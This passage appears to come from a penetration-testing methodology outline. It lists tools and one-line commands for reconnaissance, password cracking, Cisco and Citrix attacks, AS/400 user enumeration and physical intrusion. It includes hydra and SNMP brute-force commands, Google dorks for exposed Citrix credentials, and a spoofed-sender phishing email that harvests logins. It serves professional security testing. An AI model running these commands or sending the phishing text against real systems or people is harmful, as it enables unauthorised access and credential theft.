15.5.2. WEP encrypted WLAN: Visible SSID - WEPattack; Hidden SSID - deauth client

15.5.3. WPA/WPA2 encrypted WLAN: deauth client, capture EAPOL handshake

15.5.4. LEAP encrypted WLAN: deauth client, break LEAP

15.5.5. 802.1x WLAN: create Rogue Access Point (Airsnarf, fake ap, Hotspotter, Karma, Linux rogue AP)

15.5.6. Resources
    URLs: Russix; Wireless Vulnerabilities and Exploits (WVE)
    White Papers: Weaknesses in the Key Scheduling Algorithm of RC4; 802.11b Firmware-Level Attacks; Wireless Attacks from an Intrusion Detection Perspective; Implementing a Secure Wireless Network for a Windows Environment; Breaking 104 bit WEP in less than 60 seconds; PEAP Shmoocon2008 Wright & Antoniewicz; Active behavioral fingerprinting of wireless devices
    Common Vulnerabilities and Exploits (CVE) - vulnerabilities and exploit information relating to these products can be found here

16. txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c:\hostlist.txt

18. Network Footprinting (Reconnaissance). The tester attempts to gather as much information as possible about the selected network. Reconnaissance can take two forms: active and passive. A passive approach is always the best starting point, as it would normally defeat intrusion detection systems and the other forms of protection afforded to the network; it usually involves discovering publicly available information with a web browser, by visiting newsgroups, etc. An active form is more intrusive and may show up in audit logs; it may take the form of an attempted DNS zone transfer or a social engineering type of attack.

18.1. Untitled

18.1.1. Authoritative Bodies
    IANA - Internet Assigned Numbers Authority
    ICANN - Internet Corporation for Assigned Names and Numbers
    NRO - Number Resource Organisation
    RIR - Regional Internet Registry
        AFRINIC - African Network Information Centre
        APNIC - Asia Pacific Network Information Centre
        ARIN - American Registry for Internet Numbers
        LACNIC - Latin America & Caribbean Network Information Centre
        RIPE - Reseaux IP Européens Network Coordination Centre

18.1.2. Websites
    Central Ops: Domain Dossier, Email Dossier
    DNS Stuff: online DNS one-stop shop, with the ability to perform a great deal of disparate DNS type queries
    Fixed Orbit: Autonomous System lookups and other online tools available
    Geektools
    IP2Location: allows limited free IP lookups to be performed, displaying geolocation information, ISP details and other pertinent information
    Kartoo: metasearch engine that visually presents its results
    Excellent site that gives you details of shared domains on the IP queried / conversely IP to DNS resolution
    Excellent site that can be used if the above is down
    Netcraft: online search tool allowing queries for host information
    Passive DNS Replication: finds shared domains based on supplied IP addresses (Note: website utilised by the nmap hostmap.nse script)
    Robtex: excellent website allowing DNS and AS lookups to be performed with a graphical display of the results, with pointers, A, MX records and AS connectivity displayed (Note: can be unreliable with old entries; use CentralOps to verify)
    Website listing a large number of links to online traceroute resources
    Wayback Machine: stores older versions of websites, making it a good comparison tool and an excellent resource for previously removed data

18.1.3. Tools Cheops-ng Country whois Domain Research Tool Firefox Plugins AS Number Shazou Firecat Suite Gnetutil Goolag Scanner Greenwich Maltego GTWhois Sam Spade Smart whois SpiderFoot

18.2. Internet Search

18.2.1. General Information Web Investigator Tracesmart Friends Reunited eBay - profiles etc.

18.2.2. Financial EDGAR - Company information, including real-time filings. US Google Finance - General Finance Portal Hoovers - Business Intelligence, Insight and Results. US and UK Companies House UK Land Registry UK

18.2.3. Phone book/ Electoral Roll Information 123people Electoral Roll Search. UK 411 Online White Pages and Yellow Pages. US Background Check, Phone Number Lookup, Trace email, Criminal record, Find People, cell phone number search, License Plate Search. US UK Residential Business Pipl Spokeo Yasni Zabasearch People Search Engine. US

18.2.4. Generic Web Searching Code Search Forum Entries Google Hacking Database Google Email Addresses Contact Details Newsgroups/forums Blog Search Yammer Google Blog Search Technorati Jaiku Twitter Network Browser Search Engine Comparison/ Aggregator Sites Clusty Grokker Zuula Exalead Delicious

18.2.5. Metadata Search MetaData Visualisation Sites Tools Wikipedia Metadata Search

18.2.6. Social/ Business Networks Africa Australia Belgium Holland Hungary Iran Japan Korea Poland Russia Sweden UK US Assorted

18.2.7. Resources OSINT International Directory of Search Engines

18.3. DNS Record Retrieval from publicly available servers

18.3.1. Types of Information Records
SOA Records - Indicates the server that has authority for the domain.
MX Records - List of a host's or domain's mail exchanger server(s).
NS Records - List of a host's or domain's name server(s).
A Records - An address record that allows a computer name to be translated to an IP address. Each computer has to have this record for its IP address to be located via DNS.
PTR Records - Lists a host's domain name, the host being identified by its IP address.
SRV Records - Service location record.
HINFO Records - Host information record with CPU type and operating system.
TXT Records - Generic text record.
CNAME - A host's canonical name; allows additional names/ aliases to be used to locate a computer.
RP - Responsible person for the domain.

18.3.2. Database Settings Version.bind Serial Refresh Retry Expiry Minimum

18.3.3. Sub Domains

18.3.4. Internal IP ranges Reverse DNS for IP Range

18.3.5. Zone Transfer

18.4. Social Engineering

18.4.1. Remote Phone Scenarios Results Contact Details Email Scenarios Software Results Contact Details Other

18.4.2. Local Personas Name Phone Email Business Cards Contact Details Name Phone number Email Room number Department Role Scenarios New IT employee Fire Inspector Results Maps Satellite Imagery Building layouts Other

18.5. Dumpster Diving

18.5.1. Rubbish Bins

18.5.2. Contract Waste Removal

18.5.3. eBay ex-stock sales, e.g. HDDs

18.6. Web Site copy

18.6.1. HTTrack

18.6.2. Teleport Pro

18.6.3. Black Widow

19. Password cracking

19.1. Rainbow crack

19.1.1. ophcrack

19.1.2. rainbow tables rcrack c:\rainbowcrack\*.rt -f pwfile.txt

19.2. Ophcrack

19.3. Cain & Abel

19.4. John the Ripper

19.4.1. ./unshadow passwd shadow > file_to_crack

19.4.2. ./john -single file_to_crack

19.4.3. ./john -w=location_of_dictionary_file -rules file_to_crack

19.4.4. ./john -show file_to_crack

19.4.5. ./john --incremental:All file_to_crack

19.5. fgdump

19.5.1. fgdump [-t][-c][-w][-s][-r][-v][-k][-l logfile][-T threads] {{-h Host | -f filename} -u Username -p Password | -H filename} e.g. fgdump.exe -u hacker -p hard_password -c -f target.txt

19.6. pwdump6

19.7. medusa

19.8. LCP

19.9. L0phtcrack (Note: - This tool was acquired by Symantec from @Stake and it is their policy not to ship outside the USA and Canada)

19.9.1. Domain credentials

19.9.2. Sniffing

19.9.3. pwdump import

19.9.4. sam import

19.10. aiocracker

19.10.1. [md5, sha1, sha256, sha384, sha512] hash dictionary_list

20. Vulnerability Assessment - Utilising vulnerability scanners, all discovered hosts can then be tested for vulnerabilities. The results would then be analysed to determine if there are any vulnerabilities that could be exploited to gain access to a target host on the network. A number of tests carried out by these scanners are just banner grabbing/ obtaining version information; once these details are known, the version is compared with any common vulnerabilities and exploits (CVE) that have been released and the result is reported to the user. Other tools actually use manual pen testing methods and display the output received, e.g. showmount -e ip_address would display the NFS shares available to the scanner, which would then need to be verified by the tester.

20.1. Manual

20.1.1. Patch Levels

20.1.2. Confirmed Vulnerabilities Severe High Medium Low

20.2. Automated

20.2.1. Reports

20.2.2. Vulnerabilities Severe High Medium Low

20.3. Tools

20.3.1. GFI

20.3.2. Nessus (Linux) Nessus (Windows)

20.3.3. NGS Typhon

20.3.4. NGS Squirrel for Oracle

20.3.5. NGS Squirrel for SQL

20.3.6. SARA

20.3.7. MatriXay

20.3.8. BiDiBlah

20.3.9. SSA

20.3.10. Oval Interpreter

20.3.11. Xscan

20.3.12. Security Manager +

20.3.13. Inguma

20.4. Resources

20.4.1. Security Focus

20.4.2. Microsoft Security Bulletin

20.4.3. Common Vulnerabilities and Exploits (CVE)

20.4.4. National Vulnerability Database (NVD)

20.4.5. The Open Source Vulnerability Database (OSVDB) Standalone Database Update URL

20.4.6. United States Computer Emergency Response Team (US-CERT)

20.4.7. Computer Emergency Response Team

20.4.8. Mozilla Security Information

20.4.9. SANS

20.4.10. Securiteam

20.4.11. PacketStorm Security

20.4.12. Security Tracker

20.4.13. Secunia


20.4.15. ntbugtraq

20.4.16. Wireless Vulnerabilities and Exploits (WVE)

20.5. Blogs

20.5.1. Carnal0wnage

20.5.2. Fsecure Blog

20.5.3. g0ne blog

20.5.4. GNUCitizen

20.5.5. ha.ckers Blog

20.5.6. Jeremiah Grossman Blog

20.5.7. Metasploit

20.5.8. nCircle Blogs

20.5.9. pentest

20.5.10. Rational Security

20.5.11. Rise Security

20.5.12. Security Fix Blog

20.5.13. Software Vulnerability Exploitation Blog

20.5.14. Taosecurity Blog

21. AS/400 Auditing

21.1. Remote

21.1.1. Information Gathering Nmap using common iSeries (AS/400) services. Unsecured services (Port;name;description) Secured services (Port;name;description) NetCat (old school technique) nc -v -z -w target ListOfServices.txt | grep "open" Banner Grabbing Telnet FTP HTTP Banner POP3 SNMP SMTP

21.1.2. Users Enumeration
Default AS/400 user accounts
Error messages: Telnet login errors; POP3 authentication errors
Qsys symbolic link (if ftp is enabled):
ftp target
quote stat
quote site namefmt 1
cd /
quote site listfmt 1
mkdir temp
quote rcmd ADDLNK OBJ('/qsys.lib') NEWLNK('/temp/qsys')
quote rcmd QSH CMD('ln -fs /qsys.lib /temp/qsys')
dir /temp/qsys/*.usrprf
LDAP: need the os400-sys value from ibm-slapdSuffix; tool to browse LDAP

21.1.3. Exploitation CVE References CVE-2005-1244 - Severity : High - CVSS : 7.0 CVE-2005-1243 - Severity : Low - CVSS : 3.3 CVE-2005-1242 - Severity : Low - CVSS : 3.3 CVE-2005-1241 - Severity : High - CVSS : 7.0 CVE-2005-1240 - Severity : High - CVSS : 7.0 CVE-2005-1239 - Severity : Low - CVSS : 3.3 CVE-2005-1238 - Severity : High - CVSS : 9.0 CVE-2005-1182 - Severity : Low - CVSS : 3.3 CVE-2005-1133 - Severity : Low - CVSS : 3.3 CVE-2005-1025 - Severity : Low - CVSS : 3.3 CVE-2005-0868 - Severity : High - CVSS : 7.0 CVE-2005-0899 - Severity : Low - CVSS : 2.3 CVE-2002-1822 - Severity : Low - CVSS : 3.3 CVE-2002-1731 - Severity : Low - CVSS : 2.3 CVE-2000-1038 - Severity : Low - CVSS : 3.3 CVE-1999-1279 - Severity : Low - CVSS : 3.3 CVE-1999-1012 - Severity : Low - CVSS : 3.3 Access with Work Station Gateway http://target:5061/WSG Default AS/400 accounts. Network attacks (next release) DB2 QSHELL Hijacking Terminals Trojan attacks Hacking from AS/400

21.2. Local

21.2.1. System Value Security - Recommended value is 30

21.2.2. Password Policy

21.2.3. Audit level - Recommended value is *SECURITY

21.2.4. Documentation: User class; System Audit Settings; Special Authorities Definitions

22. Bluetooth Specific Testing

22.1. Bluescanner

22.2. Bluesweep

22.3. btscanner

22.4. Redfang

22.5. Blueprint

22.6. Bluesnarfer

22.7. Bluebugger

22.7.1. bluebugger [OPTIONS] -a <addr> [MODE]

22.8. Blueserial

22.9. Bloover

22.10. Bluesniff

22.11. Exploit Frameworks

22.11.1. BlueMaho

22.12. Resources

22.12.1. URLs Bluejackers bluetooth-pentest Trifinite

22.12.2. Vulnerability Information Common Vulnerabilities and Exploits (CVE) Vulnerabilities and exploit information relating to these products can be found here:

22.12.3. White Papers Bluesnarfing

23. Cisco Specific Testing

23.1. Methodology

23.1.1. Scan & Fingerprint. If SNMP is active, then community string guessing should be performed.

23.1.2. Credentials Guessing. Attempt to guess Telnet, HTTP and SSH account credentials. Once you have non-privileged access, attempt to discover the 'enable' password. Also attempt to guess Simple Network Management Protocol (SNMP) community strings, as they can lead to the config files of the router and therefore the 'enable' password!

23.1.3. Connect If you have determined the 'enable' password, then full access has been achieved and you can alter the configuration files of the router.

23.1.4. Check for bugs The most widely known/ used are: Nessus, Retina, GFI LanGuard and Core Impact. There are also tools that check for specific flaws, such as the HTTP Arbitrary Access Bug: ios-w3-vuln

23.1.5. Further your attack running-config holds the currently running configuration settings. It is loaded from the startup-config on boot. This configuration file is editable and the changes are immediate, but any changes will be lost once the router is rebooted. It is this file that requires altering to maintain a non-permanent connection through to the internal network. startup-config is the boot-up configuration file. It is this file that needs altering to maintain a permanent connection through to the internal network.
#> access-list 100 permit ip <IP> any

23.2. Scan & Fingerprint.

23.2.1. Port Scanning nmap Other tools: mass-scanner is a simple scanner for discovering Cisco devices within a given network range.

23.2.2. Fingerprinting
BT cisco-torch-0.4b # -A
TCP Port scan - nmap -sV -O -v -p 23,80 <IP> -oN TCP.version.txt

23.3. Password Guessing.

23.3.1. ./CAT -h <IP> -a password.wordlist

23.3.2. ./enabler <IP> [-u username] -p password /password.wordlist [port]

23.3.3. BT tmp # hydra -l "" -P password.wordlist -t 4 <IP> cisco

23.4. SNMP Attacks.

23.4.1. ./CAT -h <IP> -w SNMP.wordlist

23.4.2. onesixtyone -c SNMP.wordlist <IP>
BT onesixtyone-0.3.2 # onesixtyone -c dict.txt
Scanning 1 hosts, 64 communities
[enable] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug
[Cisco] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug

23.4.3. snmpwalk -v <Version> -c <Community string> <IP>

23.5. Connecting.

23.5.1. Telnet telnet <IP> Sample Banners

23.5.2. SSH

23.5.3. Web Browser This uses a combination of username and password to authenticate. After browsing to the target device, an "Authentication Required" box will pop up with text similar to the following: Authentication Required Enter username and password for "level_15_access" at User Name: Password: Once logged in, you have non-privileged mode access and can even configure the router through a command interpreter.

23.5.4. TFTP ios-w3-vuln exploits the HTTP Access Bug to 'fetch' the running-config to your local TFTP server. Both of these tools require the config files to be saved with default names. ./ <options> <IP,hostname,network> ./ <options> -F <hostlist> Creating backdoors in Cisco IOS using TCL

23.6. Known Bugs.

23.6.1. Attack Tools Web browse to the Cisco device: http://<IP> ./ios-w3-vul fetch > /tmp/router.txt

23.6.2. Common Vulnerabilities and Exploits (CVE) Information Vulnerabilities and exploit information relating to these products can be found here:

23.7. Configuration Files.

23.7.1. Configuration files explained The line that reads "enable password router", where "router" is the password, is the TTY console password, which is superseded by the enable secret password for remote access. Password Encryption Utilised Configuration Testing Tools Nipper fwauto (Beta)

23.8. References.

23.8.1. Cisco IOS Exploitation Techniques

24. Citrix Specific Testing

24.1. Citrix provides remote access services to multiple users across a wide range of platforms. I have put together the following information, which will hopefully help you conduct a vulnerability assessment/ penetration test against Citrix.

24.2. Enumeration

24.2.1. web search Google (GHDB) ext:ica inurl:citrix/metaframexp/default/login.asp [WFClient] Password= filetype:ica inurl:citrix/metaframexp/default/login.asp? ClientDetection=On inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login" inurl:/Citrix/Nfuse17/ inurl:Citrix/MetaFrame/default/default.aspx Google Hacks (Author Discovered) filetype:ica Username= inurl:/Citrix/AccessPlatform/ inurl:LogonAgent/Login.asp inurl:/CITRIX/NFUSE/default/login.asp inurl:/Citrix/NFuse161/login.asp inurl:/Citrix/NFuse16 inurl:/Citrix/NFuse151/ allintitle:MetaFrame XP Login allintitle:MetaFrame Presentation Server Login inurl:Citrix/~bespoke_company_name~/default/login.aspx?ClientDetection=On allintitle:Citrix(R) NFuse(TM) Classic Login Yahoo originurlextension:ica

24.2.2. site search Manually review the web page for useful information; review the page source as well.

24.2.3. generic nmap -A -PN -p 80,443,1494 ip_address amap -bqv ip_address port_no.

24.2.4. citrix specific perl ip_address enum.js enum.js apps TCPBrowserAddress=ip_address connect.js connect.js TCPBrowserAddress=ip_address Application=advertised-application Citrix-pa-scan perl ip_address [timeout] > pas.wri pabrute.c ./pabrute pubapp list app_list ip_address

24.2.5. Default Ports TCP Citrix XML Service Advanced Management Console Citrix SSL Relay ICA sessions Server to server Management Console to server Session Reliability (Auto-reconnect) License Management Console License server UDP Clients to ICA browser service Server-to-server

24.2.6. nmap nse scripts
citrix-enum-apps: nmap -sU --script=citrix-enum-apps -p 1604 <host>
citrix-enum-apps-xml: nmap --script=citrix-enum-apps-xml -p 80,443 <host>
citrix-enum-servers: nmap -sU --script=citrix-enum-servers -p 1604
citrix-enum-servers-xml: nmap --script=citrix-enum-servers-xml -p 80,443 <host>
citrix-brute-xml: nmap --script=citrix-brute-xml --script-args=userdb=<userdb>,passdb=<passdb>,ntdomain=<domain> -p 80,443 <host>

24.3. Scanning

24.3.1. Nessus Plugins CGI abuses CGI abuses : Cross Site Scripting (XSS) Misc. Service Detection Web Servers Windows

24.3.2. Nikto perl -host ip_address -port port_no.

24.4. Exploitation

24.4.1. Alter default .ica files InitialProgram=cmd.exe InitialProgram=explorer.exe

24.4.2. Enumerate and Connect For applications identified by Citrix-pa-scan Pas For published applications with a Citrix client when the master browser is non-public. Citrix-pa-proxy

24.5. Brute Force

24.5.1. bforce.js bforce.js TCPBrowserAddress=ip_address usernames=user1,user2 passwords=pass1,pass2 bforce.js HTTPBrowserAddress=ip_address userfile=file.txt passfile=file.txt

24.6. Review Configuration Files

24.6.1. Application server configuration file appsrv.ini Location World writeable Review other files Sample file

24.6.2. Program Neighborhood configuration file pn.ini Location Review other files Sample file

24.6.3. Citrix ICA client configuration file wfclient.ini Location

24.7. References

24.7.1. Vulnerabilities Art of Hacking Common Vulnerabilities and Exploits (CVE) Sample file OSVDB Secunia SecurityFocus

24.7.2. Support Citrix Knowledge Base Thinworld

24.7.3. Exploits Milw0rm Art of Hacking Citrix

24.7.4. Tools Resource Zip file containing the majority of the tools mentioned in this article, for easy download/ access

25. Network Backbone

25.1. Generic Toolset

25.1.1. Wireshark (Formerly Ethereal) Passive Sniffing Usernames/Passwords Email FTP HTTP HTTPS RDP VOIP Other
Filters:
ip.src == ip_address
ip.dst == ip_address
tcp.dstport == port_no.
! ip.addr == ip_address
(ip.addr eq ip_address and ip.addr eq ip_address) and (tcp.port eq 1829 and tcp.port eq 1863)

25.1.2. Cain & Abel Active Sniffing ARP Cache Poisoning DNS Poisoning Routing Protocols

25.1.3. Cisco-Torch ./ <options> <IP,hostname,network> or ./ <options> -F <hostlist>

25.1.4. NTP-Fingerprint perl -t [ip_address]

25.1.5. Yersinia

25.1.6. p0f ./p0f [ -f file ] [ -i device ] [ -s file ] [ -o file ] [ -w file ] [ -Q sock ] [ -u user ] [ -FXVONDUKASCMRqtpvdlr ] [ -c size ] [ -T nn ] [ 'filter rule' ]

25.1.7. Manual Check (Credentials required)

25.1.8. MAC Spoofing mac address changer for windows macchanger Random Mac Address:- macchanger -r eth0 madmacs smac TMAC

26. Penetration - An exploit usually relates to the existence of some flaw or vulnerability in an application or operating system that, if used, could lead to privilege escalation or denial of service against the computer system being attacked. Exploits can be compiled and used manually, or various engines exist that are, at their most basic level, pre-compiled point-and-shoot tools. These engines also have a number of extra underlying features for more advanced users.

26.1. Password Attacks

26.1.1. Known Accounts Identified Passwords Unidentified Hashes

26.1.2. Default Accounts Identified Passwords Unidentified Hashes

26.2. Exploits

26.2.1. Successful Exploits Accounts Passwords Groups Other Details Services Backdoor Connectivity

26.2.2. Unsuccessful Exploits

26.2.3. Resources
Securiteam - Exploits are sorted by year and must be downloaded individually
SecurityForest - Updated via CVS after initial install
GovernmentSecurity - Need to create an account to obtain access
Red Base Security - Oracle exploit site only
Wireless Vulnerabilities & Exploits (WVE) - Wireless exploit site
PacketStorm Security - Exploits downloadable by month and year but no indexing carried out.
SecWatch - Exploits sorted by year and month, download separately
SecurityFocus - Exploits must be downloaded individually
Metasploit - Install and regularly update via svn
Milw0rm - Exploit archive indexed and sorted by port, download as a whole - The one to go for!

26.3. Tools

26.3.1. Metasploit Free Extra Modules local copy

26.3.2. Manual SQL Injection Understanding SQL Injection SQL Injection walkthrough SQL Injection by example Blind SQL Injection Advanced SQL Injection in SQL Server More Advanced SQL Injection Advanced SQL Injection in Oracle databases SQL Cheatsheets

26.3.3. SQL Power Injector

26.3.4. SecurityForest

26.3.5. SPI Dynamics WebInspect

26.3.6. Core Impact

26.3.7. Cisco Global Exploiter

26.3.8. PIXDos perl [ --device=interface ] [--source=IP] [--dest=IP] [--sourcemac=MAC] [--destmac=MAC] [--port=n]

26.3.9. CANVAS

26.3.10. Inguma

27. Server Specific Tests

27.1. Databases

27.1.1. Direct Access Interrogation MS SQL Server Ports Version osql Oracle Ports TNS Listener SQL Plus Default Account/Passwords Default SIDs MySQL Ports Version Users/Passwords DB2 Informix Sybase Other

27.1.2. Scans Default Ports Non-Default Ports Instance Names Versions

27.1.3. Password Attacks Sniffed Passwords Cracked Passwords Hashes Direct Access Guesses

27.1.4. Vulnerability Assessment Automated Reports Vulnerabilities Manual Patch Levels Confirmed Vulnerabilities

27.2. Mail

27.2.1. Scans

27.2.2. Fingerprint Manual Automated

27.2.3. Spoofable Telnet spoof telnet target_IP 25helo target.commail from: [email protected] to: [email protected]: [email protected]: []X-Originating-Email: [[email protected]]MIME-Version: 1.0To: <[email protected]>From: < [email protected] >Subject: Important! Account check requiredContent-Type: text/htmlContent-Transfer-Encoding: 7bitDear Valued Customer,The corporate network has recently gone through a critical update to the Active Directory, we have done this to increase security of the network against hacker attacks to protect your private information. Due to this, you are required to log onto the following website with your current credentials to ensure that your account does not expire.Please go to the following website and log in with your account details. <a href=></a>Online Security Manager.Target [email protected].

27.2.4. Relays

27.3. VPN

27.3.1. Scanning 500 UDP IPSEC 1723 TCP PPTP 443 TCP/SSL nmap -sU -PN -p 500 ipsecscan

27.3.2. Fingerprinting ike-scan --showbackoff

27.3.3. PSK Crack ikeprobe; sniff for responses with Cain & Abel, or use ikecrack

27.4. Web

27.4.1. Vulnerability Assessment Automated Reports Vulnerabilities Manual Patch Levels Confirmed Vulnerabilities

27.4.2. Permissions
PUT /test.txt HTTP/1.0
CONNECT HTTP/1.0
POST HTTP/1.0
Content-Type: text/plain
Content-Length: 6

27.4.3. Scans

27.4.4. Fingerprinting Other HTTP Commands Modules File Extensions HTTPS Commands Commands File Extensions

27.4.5. Directory Traversal

28. Physical Security

28.1. Building Security

28.1.1. Meeting Rooms Check for active network jacks. Check for any information in room.

28.1.2. Lobby Check for active network jacks. Does the receptionist/guard leave the lobby? Accessible printers? Print a test page. Obtain phone/personnel listing.

28.1.3. Communal Areas Check for active network jacks. Check for any information in room. Listen for employee conversations.

28.1.4. Room Security Resistance of lock to picking. What type of locks are used in the building? Pin tumblers, padlocks, cabinet locks, dimple keys, proximity sensors? Ceiling access areas. Can you enter the ceiling space (above a suspended ceiling) and enter secured rooms?

28.1.5. Windows Check windows/doors for visible intruder alarm sensors. Check visible areas for sensitive information. Can you video users logging on?

28.2. Perimeter Security

28.2.1. Fence Security Attempt to verify that the whole of the perimeter fence is unbroken.

28.2.2. Exterior Doors If there is no perimeter fence, then determine if exterior doors are secured, guarded and monitored etc.

28.2.3. Guards Patrol Routines Analyse patrol timings to ascertain if any holes exist in the coverage. Communications Intercept and analyse guard communications. Determine if the communication methods can be used to aid a physical intrusion.

28.3. Entry Points

28.3.1. Guarded Doors Piggybacking Attempt to closely follow employees into the building without having to show valid credentials. Fake ID Attempt to use fake ID to gain access. Access Methods Test 'out of hours' entry methods

28.3.2. Unguarded Doors Identify all unguarded entry points. Are doors secured? Check locks for resistance to lock picking.

28.3.3. Windows Check windows/doors for visible intruder alarm sensors. Attempt to bypass sensors.

28.4. Office Waste

28.4.1. Dumpster Diving Attempt to retrieve any useful information from ToE refuse. This may include: printed documents, books, manuals, laptops, PDAs, USB memory devices, CDs, floppy discs etc.

29. Final Report - template

30. Contributors

30.1. Matt Byrne

30.1.1. Matt contributed the majority of the Wireless section.

30.2. Arvind Doraiswamy

30.2.1. Arvind kindly contributed to the associated MySQL section when coming across TCP Port 3306 open.

30.3. Lee Lawson

30.3.1. Lee contributed the majority of the Cisco and Social Engineering sections.

30.4. Nabil OUCHN